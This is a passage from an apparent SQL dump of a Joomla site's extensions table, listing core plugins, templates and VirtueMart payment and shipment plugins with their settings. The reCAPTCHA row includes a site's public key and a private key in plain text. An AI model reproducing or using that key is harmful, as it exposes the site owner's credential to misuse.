Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SEARCH_NEWSFEEDS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"newsfeeds\"}','{\"search_limit\":\"50\",\"search_content\":\"1\",\"search_archived\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(421,0,'plg_search_weblinks','plugin','weblinks','search',0,1,1,0,'{\"legacy\":false,\"name\":\"plg_search_weblinks\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"PLG_SEARCH_WEBLINKS_XML_DESCRIPTION\",\"group\":\"\"}','{\"search_limit\":\"50\",\"search_content\":\"1\",\"search_archived\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(422,0,'plg_system_languagefilter','plugin','languagefilter','system',0,1,1,1,'{\"name\":\"plg_system_languagefilter\",\"type\":\"plugin\",\"creationDate\":\"July 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2010 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SYSTEM_LANGUAGEFILTER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"languagefilter\"}','{\"detect_browser\":\"1\",\"automatic_change\":\"1\",\"menu_associations\":\"1\",\"remove_default_prefix\":\"0\",\"lang_cookie\":\"1\",\"alternate_meta\":\"0\"}','','',0,'0000-00-00 00:00:00',1,0),(423,0,'plg_system_p3p','plugin','p3p','system',0,1,1,1,'{\"name\":\"plg_system_p3p\",\"type\":\"plugin\",\"creationDate\":\"September 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2010 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_P3P_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"p3p\"}','{\"headers\":\"NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM\"}','','',0,'0000-00-00 00:00:00',2,0),(424,0,'plg_system_cache','plugin','cache','system',0,0,1,1,'{\"name\":\"plg_system_cache\",\"type\":\"plugin\",\"creationDate\":\"February 2007\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2007 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_CACHE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"cache\"}','{\"browsercache\":\"0\",\"cachetime\":\"15\"}','','',0,'0000-00-00 00:00:00',9,0),(425,0,'plg_system_debug','plugin','debug','system',0,1,1,0,'{\"name\":\"plg_system_debug\",\"type\":\"plugin\",\"creationDate\":\"December 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_DEBUG_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"debug\"}','{\"session\":1,\"profile\":1,\"queries\":1,\"query_types\":1,\"memory\":1,\"logs\":1,\"log_priorities\":[\"all\"],\"log_categories\":\"\",\"log_category_mode\":0,\"refresh_assets\":1,\"language_errorfiles\":1,\"language_files\":1,\"language_strings\":1,\"strip-first\":1,\"strip-prefix\":\"\",\"strip-suffix\":\"\",\"log-deprecated\":0,\"log-everything\":1,\"log-executed-sql\":0}','','',0,'0000-00-00 00:00:00',4,0),(426,0,'plg_system_log','plugin','log','system',0,1,1,1,'{\"name\":\"plg_system_log\",\"type\":\"plugin\",\"creationDate\":\"April 2007\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2007 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_LOG_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"log\"}','{}','','',0,'0000-00-00 00:00:00',5,0),(427,0,'plg_system_redirect','plugin','redirect','system',0,1,1,1,'{\"name\":\"plg_system_redirect\",\"type\":\"plugin\",\"creationDate\":\"April 2009\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2009 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SYSTEM_REDIRECT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"redirect\"}','{}','','',0,'0000-00-00 00:00:00',6,0),(428,0,'plg_system_remember','plugin','remember','system',0,1,1,1,'{\"name\":\"plg_system_remember\",\"type\":\"plugin\",\"creationDate\":\"April 2007\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2007 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_REMEMBER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"remember\"}','{}','','',0,'0000-00-00 00:00:00',7,0),(429,0,'plg_system_sef','plugin','sef','system',0,1,1,0,'{\"name\":\"plg_system_sef\",\"type\":\"plugin\",\"creationDate\":\"December 2007\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2007 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SEF_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"sef\"}','{}','','',0,'0000-00-00 00:00:00',8,0),(430,0,'plg_system_logout','plugin','logout','system',0,1,1,1,'{\"name\":\"plg_system_logout\",\"type\":\"plugin\",\"creationDate\":\"April 2009\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2009 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SYSTEM_LOGOUT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"logout\"}','{}','','',0,'0000-00-00 00:00:00',3,0),(431,0,'plg_user_contactcreator','plugin','contactcreator','user',0,0,1,1,'{\"name\":\"plg_user_contactcreator\",\"type\":\"plugin\",\"creationDate\":\"August 2009\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2009 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_CONTACTCREATOR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"contactcreator\"}','{\"autowebpage\":\"\",\"category\":\"34\",\"autopublish\":\"0\"}','','',0,'0000-00-00 00:00:00',1,0),(432,0,'plg_user_joomla','plugin','joomla','user',0,1,1,0,'{\"name\":\"plg_user_joomla\",\"type\":\"plugin\",\"creationDate\":\"December 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_USER_JOOMLA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"joomla\"}','{\"autoregister\":\"1\"}','','',0,'0000-00-00 00:00:00',2,0),(433,0,'plg_user_profile','plugin','profile','user',0,0,1,1,'{\"name\":\"plg_user_profile\",\"type\":\"plugin\",\"creationDate\":\"January 2008\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2008 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_USER_PROFILE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"profile\"}','{\"register-require_address1\":\"1\",\"register-require_address2\":\"1\",\"register-require_city\":\"1\",\"register-require_region\":\"1\",\"register-require_country\":\"1\",\"register-require_postal_code\":\"1\",\"register-require_phone\":\"1\",\"register-require_website\":\"1\",\"register-require_favoritebook\":\"1\",\"register-require_aboutme\":\"1\",\"register-require_tos\":\"1\",\"register-require_dob\":\"1\",\"profile-require_address1\":\"1\",\"profile-require_address2\":\"1\",\"profile-require_city\":\"1\",\"profile-require_region\":\"1\",\"profile-require_country\":\"1\",\"profile-require_postal_code\":\"1\",\"profile-require_phone\":\"1\",\"profile-require_website\":\"1\",\"profile-require_favoritebook\":\"1\",\"profile-require_aboutme\":\"1\",\"profile-require_tos\":\"1\",\"profile-require_dob\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(434,0,'plg_extension_joomla','plugin','joomla','extension',0,1,1,1,'{\"name\":\"plg_extension_joomla\",\"type\":\"plugin\",\"creationDate\":\"May 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2010 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_EXTENSION_JOOMLA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"joomla\"}','{}','','',0,'0000-00-00 00:00:00',1,0),(435,0,'plg_content_joomla','plugin','joomla','content',0,1,1,0,'{\"name\":\"plg_content_joomla\",\"type\":\"plugin\",\"creationDate\":\"November 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2010 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_CONTENT_JOOMLA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"joomla\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(436,0,'plg_system_languagecode','plugin','languagecode','system',0,1,1,0,'{\"name\":\"plg_system_languagecode\",\"type\":\"plugin\",\"creationDate\":\"November 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2011 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SYSTEM_LANGUAGECODE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"languagecode\"}','{}','','',0,'0000-00-00 00:00:00',10,0),(437,0,'plg_quickicon_joomlaupdate','plugin','joomlaupdate','quickicon',0,1,1,1,'{\"name\":\"plg_quickicon_joomlaupdate\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2011 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_QUICKICON_JOOMLAUPDATE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"joomlaupdate\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(438,0,'plg_quickicon_extensionupdate','plugin','extensionupdate','quickicon',0,1,1,1,'{\"name\":\"plg_quickicon_extensionupdate\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2011 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_QUICKICON_EXTENSIONUPDATE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"extensionupdate\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(439,0,'plg_captcha_recaptcha','plugin','recaptcha','captcha',0,1,1,0,'{\"name\":\"plg_captcha_recaptcha\",\"type\":\"plugin\",\"creationDate\":\"December 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2011 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.4.0\",\"description\":\"PLG_CAPTCHA_RECAPTCHA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"recaptcha\"}','{\"version\":\"2.0\",\"public_key\":\"6LdkH7kUAAAAACcvxJx05f6pqZltYL93nXtM47nz\",\"private_key\":\"6LdkH7kUAAAAALf_9QUYQVekXNUdgGqgqyciew6B\",\"theme\":\"clean\",\"theme2\":\"light\",\"size\":\"normal\",\"tabindex\":\"0\",\"callback\":\"\",\"expired_callback\":\"\",\"error_callback\":\"\"}','','',0,'0000-00-00 00:00:00',0,0),(440,0,'plg_system_highlight','plugin','highlight','system',0,1,1,0,'{\"name\":\"plg_system_highlight\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2011 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SYSTEM_HIGHLIGHT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"highlight\"}','{}','','',0,'0000-00-00 00:00:00',7,0),(441,0,'plg_content_finder','plugin','finder','content',0,0,1,0,'{\"name\":\"plg_content_finder\",\"type\":\"plugin\",\"creationDate\":\"December 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2011 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_CONTENT_FINDER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"finder\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(442,0,'plg_finder_categories','plugin','categories','finder',0,1,1,0,'{\"name\":\"plg_finder_categories\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2011 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_FINDER_CATEGORIES_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"categories\"}','{}','','',0,'0000-00-00 00:00:00',1,0),(443,0,'plg_finder_contacts','plugin','contacts','finder',0,1,1,0,'{\"name\":\"plg_finder_contacts\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2011 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_FINDER_CONTACTS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"contacts\"}','{}','','',0,'0000-00-00 00:00:00',2,0),(444,0,'plg_finder_content','plugin','content','finder',0,1,1,0,'{\"name\":\"plg_finder_content\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2011 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_FINDER_CONTENT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"content\"}','{}','','',0,'0000-00-00 00:00:00',3,0),(445,0,'plg_finder_newsfeeds','plugin','newsfeeds','finder',0,1,1,0,'{\"name\":\"plg_finder_newsfeeds\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2011 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_FINDER_NEWSFEEDS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"newsfeeds\"}','{}','','',0,'0000-00-00 00:00:00',4,0),(446,0,'plg_finder_weblinks','plugin','weblinks','finder',0,1,1,0,'{\"legacy\":false,\"name\":\"plg_finder_weblinks\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"PLG_FINDER_WEBLINKS_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',5,0),(500,0,'atomic','template','atomic','',0,1,1,0,'{\"legacy\":false,\"name\":\"atomic\",\"type\":\"template\",\"creationDate\":\"10\\/10\\/09\",\"author\":\"Ron Severdia\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters, Inc. All rights reserved.\",\"authorEmail\":\"contact@kontentdesign.com\",\"authorUrl\":\"http:\\/\\/www.kontentdesign.com\",\"version\":\"2.5.0\",\"description\":\"TPL_ATOMIC_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(502,0,'bluestork','template','bluestork','',1,1,1,0,'{\"legacy\":false,\"name\":\"bluestork\",\"type\":\"template\",\"creationDate\":\"07\\/02\\/09\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters, Inc. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"TPL_BLUESTORK_XML_DESCRIPTION\",\"group\":\"\"}','{\"useRoundedCorners\":\"1\",\"showSiteName\":\"0\",\"textBig\":\"0\",\"highContrast\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(503,0,'beez_20','template','beez_20','',0,1,1,0,'{\"legacy\":false,\"name\":\"beez_20\",\"type\":\"template\",\"creationDate\":\"25 November 2009\",\"author\":\"Angie Radtke\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters, Inc. All rights reserved.\",\"authorEmail\":\"a.radtke@derauftritt.de\",\"authorUrl\":\"http:\\/\\/www.der-auftritt.de\",\"version\":\"2.5.0\",\"description\":\"TPL_BEEZ2_XML_DESCRIPTION\",\"group\":\"\"}','{\"wrapperSmall\":\"53\",\"wrapperLarge\":\"72\",\"sitetitle\":\"\",\"sitedescription\":\"\",\"navposition\":\"center\",\"templatecolor\":\"nature\"}','','',0,'0000-00-00 00:00:00',0,0),(504,0,'hathor','template','hathor','',1,1,1,0,'{\"name\":\"hathor\",\"type\":\"template\",\"creationDate\":\"May 2010\",\"author\":\"Andrea Tarr\",\"copyright\":\"(C) 2010 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"\",\"version\":\"3.0.0\",\"description\":\"TPL_HATHOR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"templateDetails\"}','{\"showSiteName\":\"0\",\"colourChoice\":\"0\",\"boldText\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(505,0,'beez5','template','beez5','',0,1,1,0,'{\"legacy\":false,\"name\":\"beez5\",\"type\":\"template\",\"creationDate\":\"21 May 2010\",\"author\":\"Angie Radtke\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters, Inc. All rights reserved.\",\"authorEmail\":\"a.radtke@derauftritt.de\",\"authorUrl\":\"http:\\/\\/www.der-auftritt.de\",\"version\":\"2.5.0\",\"description\":\"TPL_BEEZ5_XML_DESCRIPTION\",\"group\":\"\"}','{\"wrapperSmall\":\"53\",\"wrapperLarge\":\"72\",\"sitetitle\":\"\",\"sitedescription\":\"\",\"navposition\":\"center\",\"html5\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(600,0,'English (en-GB)','language','en-GB','',0,1,1,1,'{\"name\":\"English (en-GB)\",\"type\":\"language\",\"creationDate\":\"July 2023\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.10.12\",\"description\":\"en-GB site language\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(601,0,'English (en-GB)','language','en-GB','',1,1,1,1,'{\"name\":\"English (en-GB)\",\"type\":\"language\",\"creationDate\":\"July 2023\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.10.12\",\"description\":\"en-GB administrator language\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(700,0,'files_joomla','file','joomla','',0,1,1,1,'{\"name\":\"files_joomla\",\"type\":\"file\",\"creationDate\":\"July 2023\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2019 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.10.12\",\"description\":\"FILES_JOOMLA_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(800,0,'PKG_JOOMLA','package','pkg_joomla','',0,1,1,1,'{\"legacy\":false,\"name\":\"PKG_JOOMLA\",\"type\":\"package\",\"creationDate\":\"2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"http:\\/\\/www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"PKG_JOOMLA_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(10000,0,'VIRTUEMART','component','com_virtuemart','',1,1,0,0,'{\"name\":\"VIRTUEMART\",\"type\":\"component\",\"creationDate\":\"January 29 2021\",\"author\":\"The VirtueMart Development Team\",\"copyright\":\"Copyright (C) 2004-2018 Virtuemart Team. All rights reserved.\",\"authorEmail\":\"max|at|virtuemart.net\",\"authorUrl\":\"https:\\/\\/virtuemart.net\",\"version\":\"3.8.8\",\"description\":\"\",\"group\":\"\",\"filename\":\"virtuemart\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10001,0,'VirtueMart_allinone','component','com_virtuemart_allinone','',1,1,0,0,'{\"name\":\"VirtueMart_allinone\",\"type\":\"component\",\"creationDate\":\"January 29 2021\",\"author\":\"The VirtueMart Development Team\",\"copyright\":\"Copyright (C) 2004-2017 Virtuemart Team. All rights reserved.\",\"authorEmail\":\"\",\"authorUrl\":\"https:\\/\\/virtuemart.net\",\"version\":\"3.8.8\",\"description\":\"\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10002,0,'VM Payment - Standard','plugin','standard','vmpayment',0,1,1,0,'{\"name\":\"Standard\",\"type\":\"plugin\",\"creationDate\":\"January 29 2021\",\"author\":\"The VirtueMart Development Team\",\"copyright\":\"Copyright (C) 2004 - 2019 Virtuemart Team. All rights reserved.\",\"authorEmail\":\"\",\"authorUrl\":\"https:\\/\\/virtuemart.net\",\"version\":\"3.8.8\",\"description\":\"Standard payment plugin\",\"group\":\"\",\"filename\":\"standard\"}','','','',0,'0000-00-00 00:00:00',20,0),(10003,0,'VM Payment - Klarna','plugin','klarna','vmpayment',0,0,1,0,'{\"name\":\"Klarna\",\"type\":\"plugin\",\"creationDate\":\"November 06 2020\",\"author\":\"The VirtueMart Development Team\",\"copyright\":\"Copyright (C) 2004 - 2019 Virtuemart Team. All rights reserved.\",\"authorEmail\":\"\",\"authorUrl\":\"https:\\/\\/virtuemart.net\",\"version\":\"3.8.6\",\"description\":\"Klarna VirtueMart Payment Plugin\",\"group\":\"\",\"filename\":\"klarna\"}','','','',0,'0000-00-00 00:00:00',4,0),(10004,0,'VM Payment - KlarnaCheckout','plugin','klarnacheckout','vmpayment',0,0,1,0,'{\"name\":\"Klarna Checkout\",\"type\":\"plugin\",\"creationDate\":\"November 06 2020\",\"author\":\"The VirtueMart Development Team\",\"copyright\":\"Copyright (C) 2004 - 2020 Virtuemart Team. All rights reserved.\",\"authorEmail\":\"\",\"authorUrl\":\"https:\\/\\/virtuemart.net\",\"version\":\"3.8.6\",\"description\":\"\",\"group\":\"\",\"filename\":\"klarnacheckout\"}','','','',0,'0000-00-00 00:00:00',20,0),(10005,0,'VM Payment - Sofort Banking/Überweisung','plugin','sofort','vmpayment',0,0,1,0,'{\"name\":\"Sofort\",\"type\":\"plugin\",\"creationDate\":\"November 06 2020\",\"author\":\"The VirtueMart Development Team\",\"copyright\":\"Copyright (C) 2004 - 2019 Virtuemart Team. All rights reserved.\",\"authorEmail\":\"\",\"authorUrl\":\"https:\\/\\/virtuemart.net\",\"version\":\"3.8.6\",\"description\":\"<a href=\\\"http:\\/www.sofort.com\\\" target=\\\"_blank\\\">Sofort<\\/a> is a popular\\n\\tpayment provider and available in many countries. \\n    \",\"group\":\"\",\"filename\":\"sofort\"}','','','',0,'0000-00-00 00:00:00',2,0),(10006,0,'PayPal','plugin','paypal','vmpayment',0,1,1,0,'{\"name\":\"PayPal\",\"type\":\"plugin\",\"creationDate\":\"November 06 2020\",\"author\":\"VirtueMart Development Team\",\"copyright\":\"Copyright (C) 2004 - 2020 Virtuemart Team. All rights reserved.\",\"authorEmail\":\"\",\"authorUrl\":\"https:\\/\\/virtuemart.net\",\"version\":\"3.8.6\",\"description\":\"PayPal\",\"group\":\"\",\"filename\":\"paypal\"}','','','',0,'0000-00-00 00:00:00',0,0),(10007,0,'VM Payment - Heidelpay','plugin','heidelpay','vmpayment',0,0,1,0,'{\"name\":\"Heidelpay\",\"type\":\"plugin\",\"creationDate\":\"12-Sep-2012\",\"author\":\"Heidelberger Payment GmbH\",\"copyright\":\"Copyright Heidelberger Payment GmbH\",\"authorEmail\":\"info@heidelpay.de\",\"authorUrl\":\"http:\\/\\/www.heidelpay.de\",\"version\":\"16.11.07\",\"description\":\"\\n        <h2>Virtuemart Plugin von:<\\/h2><p><a href=\\\"https:\\/\\/www.Heidelpay.de\\\" target=\\\"_blank\\\"><img src=\\\"https:\\/\\/www.heidelpay.de\\/gfx\\/logo.gif\\\" style=\\\"margin-right:20px;\\\"\\/><\\/a><\\/p> \",\"group\":\"\",\"filename\":\"heidelpay\"}','','','',0,'0000-00-00 00:00:00',6,0),(10008,0,'VM Payment - Paybox','plugin','paybox','vmpayment',0,0,1,0,'{\"name\":\"VM Payment - Paybox\",\"type\":\"plugin\",\"creationDate\":\"November 06 2020\",\"author\":\"The VirtueMart Development Team\",\"copyright\":\"Copyright (C) 2004 - 2018 Virtuemart Team. All rights reserved.\",\"authorEmail\":\"\",\"authorUrl\":\"https:\\/\\/virtuemart.net\",\"version\":\"3.8.6\",\"description\":\"<a href=\\\"http:\\/\\/paybox.com\\\" target=\\\"_blank\\\">Paybox<\\/a> \\n    \",\"group\":\"\",\"filename\":\"paybox\"}','','','',0,'0000-00-00 00:00:00',5,0),(10121,0,'VM Framework Loader during Plugin Updates','plugin','vmLoaderPluginUpdate','system',0,1,1,0,'{\"name\":\"PLG_SYSTEM_VMLOADERPLUGINUPDATE\",\"type\":\"plugin\",\"creationDate\":\"2019-10-08\",\"author\":\"The VirtueMart Development Team\",\"copyright\":\"Copyright (C) 2017 Reinhold Kainhofer.\",\"authorEmail\":\"\",\"authorUrl\":\"http:\\/\\/www.virtuemart.net\\/\",\"version\":\"1.0.2\",\"description\":\"PLG_SYSTEM_VMLOADERPLUGINUPDATE_DESC\",\"group\":\"\",\"filename\":\"vmLoaderPluginUpdate\"}','','','',0,'0000-00-00 00:00:00',0,0),(10018,0,'VM Payment - Authorize.net','plugin','authorizenet','vmpayment',0,0,1,0,'{\"name\":\"Authorize.net AIM\",\"type\":\"plugin\",\"creationDate\":\"November 06 2020\",\"author\":\"The VirtueMart Development Team\",\"copyright\":\"Copyright (C) 2004 - 2019 Virtuemart Team. All rights reserved.\",\"authorEmail\":\"\",\"authorUrl\":\"https:\\/\\/virtuemart.net\",\"version\":\"3.8.6\",\"description\":\"Authorize.net AIM\",\"group\":\"\",\"filename\":\"authorizenet\"}','','','',0,'0000-00-00 00:00:00',20,0),(10019,0,'VM Payment - Sofort iDeal','plugin','sofort_ideal','vmpayment',0,0,1,0,'{\"name\":\"Sofort Ideal\",\"type\":\"plugin\",\"creationDate\":\"November 06 2020\",\"author\":\"The VirtueMart Development Team\",\"copyright\":\"Copyright (C) 2004 - 2015 Virtuemart Team. All rights reserved.\",\"authorEmail\":\"\",\"authorUrl\":\"https:\\/\\/virtuemart.net\",\"version\":\"3.8.6\",\"description\":\"<a href=\\\"http:\\/www.sofort.com\\\" target=\\\"_blank\\\">Sofort<\\/a> is a popular\\n\\tpayment provider and available in many countries. \\n    \",\"group\":\"\",\"filename\":\"sofort\"}','','','',0,'0000-00-00 00:00:00',3,0),(10020,0,'VM Shipment - By weight, ZIP and countries','plugin','weight_countries','vmshipment',0,1,1,0,'{\"name\":\"By weight, ZIP and countries\",\"type\":\"plugin\",\"creationDate\":\"November 06 2020\",\"author\":\"The VirtueMart Development Team\",\"copyright\":\"Copyright (C) 2004 - 2019 Virtuemart Team. All rights reserved.\",\"authorEmail\":\"\",\"authorUrl\":\"https:\\/\\/virtuemart.net\",\"version\":\"3.8.6\",\"description\":\"VMSHIPMENT_WEIGHT_COUNTRIES_PLUGIN_DESC\",\"group\":\"\",\"filename\":\"weight_countries\"}','','','',0,'0000-00-00 00:00:00',0,0),(10021,0,'VM Custom - Customer text input','plugin','textinput','vmcustom',0,1,1,0,'{\"name\":\"VMCustom - textinput\",\"type\":\"plugin\",\"creationDate\":\"November 06 2020\",\"author\":\"The VirtueMart Development Team\",\"copyright\":\"Copyright (C) 2004-2019 Virtuemart Team. All rights reserved.\",\"authorEmail\":\"\",\"authorUrl\":\"https:\\/\\/virtuemart.net\",\"version\":\"3.8.6\",\"description\":\"text input plugin for product\",\"group\":\"\",\"filename\":\"textinput\"}','','','',0,'0000-00-00 00:00:00',0,0),(10022,0,'VM Custom - Product 